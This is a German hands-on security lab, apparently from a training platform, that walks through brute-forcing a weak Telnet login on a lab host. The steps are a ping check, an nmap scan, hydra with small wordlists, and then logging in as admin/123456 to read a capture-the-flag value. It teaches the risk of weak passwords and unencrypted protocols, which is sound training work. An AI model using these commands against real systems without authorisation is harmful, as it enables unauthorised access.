Telnet Brute-Force und schwache Anmeldedaten

LinuxBeginner
Jetzt üben

Einführung

Willkommen zu diesem praktischen Lab, das sich auf Passwortsicherheit und Brute-Force-Angriffe konzentriert. Viele Sicherheitsverletzungen geschehen nicht aufgrund komplexer Software-Exploits, sondern wegen einfacher, schwacher oder Standard-Anmeldeinformationen. Ein Brute-Force-Angriff ist eine automatisierte Methode, bei der zahlreiche Benutzername- und Passwortkombinationen ausprobiert werden, bis die richtige gefunden ist.

In diesem Lab simulieren Sie einen Angriff auf ein System mit einem anfälligen Telnet-Dienst, der durch ein schwaches Passwort geschützt ist. Sie werden Standard-Penetrationstest-Tools verwenden, um Aufklärung zu betreiben, sich auf den Angriff vorzubereiten und ihn auszuführen. Sie beginnen mit der Überprüfung der Konnektivität, dem Scannen des Ziels mit nmap und verwenden dann hydra, ein beliebtes Tool zum Knacken von Passwörtern, um die Anmeldeinformationen zu entdecken. Schließlich verwenden Sie die entdeckten Anmeldeinformationen, um auf das System zuzugreifen und eine Flagge zu erfassen.

Nach Abschluss werden Sie verstehen, wie Sie:

  • Die Netzwerkkonnektivität mit ping überprüfen.
  • nmap verwenden, um zu bestätigen, dass ein bestimmter Dienst läuft.
  • Wortlisten für einen Brute-Force-Angriff erstellen.
  • hydra verwenden, um einen Brute-Force-Angriff gegen einen Telnet-Dienst durchzuführen.
  • Mit kompromittierten Anmeldeinformationen auf ein System zugreifen.

Lassen Sie uns beginnen.

Konnektivität zum Ziel mit Ping überprüfen

In diesem Schritt beginnen Sie damit, zu bestätigen, dass Ihre Angriffsmaschine mit dem Zielsystem kommunizieren kann. Der Befehl ping ist ein grundlegendes Netzwerkdiagnose-Tool, das eine Anfrage an einen Zielhost sendet und auf eine Antwort wartet, um dessen Erreichbarkeit zu bestätigen.

Ihre Umgebung umfasst ein Zielsystem, das unter dem Hostnamen target erreichbar ist. Um sicherzustellen, dass es online und reaktionsfähig ist, führen Sie den folgenden Befehl in Ihrem Terminal aus. Das Flag -c 4 weist ping an, genau vier Pakete zu senden.

ping -c 4 target

Sie sollten eine ähnliche Antwort wie unten sehen. Dies bestätigt, dass das Ziel online ist und Ihre Netzwerkverbindung stabil ist. Die IP-Adresse und die Antwortzeiten können leicht abweichen.

PING target (172.17.0.2) 56(84) bytes of data.
64 bytes from target (172.17.0.2): icmp_seq=1 ttl=64 time=0.086 ms
64 bytes from target (172.17.0.2): icmp_seq=2 ttl=64 time=0.064 ms
64 bytes from target (172.17.0.2): icmp_seq=3 ttl=64 time=0.063 ms
64 bytes from target (172.17.0.2): icmp_seq=4 ttl=64 time=0.064 ms

--- target ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3069ms
rtt min/avg/max/mdev = 0.063/0.069/0.086/0.010 ms

Nachdem die Konnektivität bestätigt wurde, sind Sie bereit, mit dem Scannen des Ziels fortzufahren.

Offene Ports mit Nmap scannen

In diesem Schritt verwenden Sie nmap, um das Ziel auf offene Ports und laufende Dienste zu scannen. Dies ist ein wichtiger Teil der Aufklärung, da es hilft, potenzielle Eintrittspunkte zu identifizieren. Wir vermuten, dass ein Telnet-Dienst läuft, der typischerweise Port 23 verwendet.

Um dies zu bestätigen, führen Sie einen gezielten nmap-Scan durch. Das Flag -p 23 konzentriert den Scan speziell auf den Telnet-Port.

Führen Sie den folgenden Befehl in Ihrem Terminal aus:

nmap -p 23 target

Die Ausgabe zeigt den Status des angegebenen Ports an. Sie sollten ein Ergebnis ähnlich diesem sehen:

Starting Nmap 7.80 ( https://nmap.org ) at 2025-09-19 14:10 CST
Nmap scan report for target (172.17.0.2)
Host is up (0.00040s latency).

PORT   STATE SERVICE
23/tcp open  telnet

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds

Die Ausgabe bestätigt, dass Port 23/tcp open ist und einen telnet-Dienst ausführt. Dies ist der Dienst, den wir im nächsten Schritt anvisieren werden.

Per Telnet mit Brute Force zum Ziel verbinden

In diesem Schritt führen Sie einen Brute-Force-Angriff auf den Telnet-Dienst mit hydra durch. Da wir das Passwort nicht kennen, stellen wir hydra Listen mit potenziellen Benutzernamen und Passwörtern zur Verfügung, die automatisch ausprobiert werden.

Erstellen Sie zunächst zwei einfache Wortlisten. Eine für Benutzernamen (users.txt) und eine für Passwörter (pass.txt). Wir werden gängige und wahrscheinliche Kandidaten aufnehmen.

Erstellen Sie die Benutzerliste:

echo -e "admin\nuser\nroot" > users.txt

Erstellen Sie die Passwortliste:

echo -e "password\nadmin\n123456" > pass.txt

Verwenden Sie nun hydra, um den Angriff zu starten. Das Flag -L gibt die Benutzerliste an, -P die Passwortliste, und telnet://target definiert das Protokoll und den Host, der angegriffen werden soll.

hydra -L users.txt -P pass.txt telnet://target

hydra versucht nun, sich mit jeder Kombination aus Benutzername und Passwort aus Ihren Listen anzumelden. Nach einigen Momenten findet es die richtigen Anmeldedaten und zeigt sie an.

Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-19 14:11:54
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking telnet://target:23/
[23][telnet] host: target   login: admin   password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-09-19 14:11:57

Die Ausgabe zeigt deutlich, dass eine gültige Anmeldung gefunden wurde: Benutzername admin mit dem Passwort 123456.

Zielsystem erkunden und Flagge finden

In diesem Schritt verwenden Sie die von hydra entdeckten Anmeldedaten, um sich beim Zielsystem anzumelden und die Flagge zu finden. Dies ist die letzte Phase des Angriffs, in der Sie Ihr Ziel erreichen.

Verbinden Sie sich mit dem Ziel über den telnet-Client:

telnet target

Das System fordert Sie zur Anmeldung auf. Geben Sie den Benutzernamen admin ein und drücken Sie Enter. Geben Sie dann, wenn Sie nach dem Passwort gefragt werden, 123456 ein und drücken Sie Enter.

Trying 172.17.0.2...
Connected to target.
Escape character is '^]'.

Linux 5.15.0-56-generic (target) (pts/0)

target login: admin
Password:

Nach erfolgreicher Anmeldung erhalten Sie eine Shell-Eingabeaufforderung. Sie befinden sich nun im Zielsystem.

Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-56-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Fri Sep 19 06:11:55 UTC 2025 from 172.17.0.1 on pts/0
admin@target:~$

Listen Sie nun den Inhalt des aktuellen Verzeichnisses (/home/admin) auf, um die Flagge zu finden.

ls -la

Sie sehen die Datei flag.txt in der Liste.

admin@target:~$ ls -la
total 28
drwxr-xr-x 3 admin admin 4096 Sep 19 06:11 .
drwxr-xr-x 1 root  root  4096 Sep 19 06:08 ..
-rw-r--r-- 1 admin admin  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 admin admin 3771 Feb 25  2020 .bashrc
drwx------ 2 admin admin 4096 Sep 19 06:11 .cache
-rw-r--r-- 1 admin admin  807 Feb 25  2020 .profile
-rw-r--r-- 1 admin admin   33 Sep 19 06:08 flag.txt

Verwenden Sie schließlich den Befehl cat, um den Inhalt von flag.txt zu lesen.

cat flag.txt

Das Terminal zeigt die Flagge an.

admin@target:~$ cat flag.txt
labex{w34k_p4ssw0rd_brut3f0rc3d}

Herzlichen Glückwunsch! Sie haben den Telnet-Dienst erfolgreich per Brute-Force geknackt und die Flagge erbeutet. Kopieren Sie den Flag-Wert, um das Lab abzuschließen. Um die Sitzung zu beenden, geben Sie logout ein und drücken Sie Enter.

Zusammenfassung

In diesem Lab haben Sie erfolgreich einen Brute-Force-Angriff auf einen Telnet-Dienst ausgeführt. Sie haben einen systematischen Ansatz zur Kompromittierung eines Systems mit schwachen Anmeldedaten kennengelernt.

Sie haben geübt, wie man:

  • Die Netzwerkerreichbarkeit mit ping bestätigt.
  • Mit nmap überprüft, ob ein bestimmter Dienst auf einem Zielport aktiv ist.
  • Einfache, aber effektive Wortlisten für Benutzernamen und Passwörter erstellt.
  • hydra einsetzt, um den Prozess des Ausprobierens von Login-Kombinationen zu automatisieren und gültige Anmeldedaten zu identifizieren.
  • Die kompromittierten Anmeldedaten verwendet, um sich anzumelden, das Zielsystem zu erkunden und eine Flagge abzurufen.

Diese Übung demonstriert ein grundlegendes Sicherheitsrisiko: die Verwendung schwacher, leicht zu erratender Passwörter. Sie unterstreicht auch die Gefahr der Verwendung unverschlüsselter Protokolle wie Telnet, die Anmeldedaten für das Netzwerk-Sniffing offenlegen. Die erlernten Fähigkeiten sind sowohl für ethische Hacker, die Systemverteidigungen testen, als auch für Systemadministratoren, die diese sichern müssen, unerlässlich.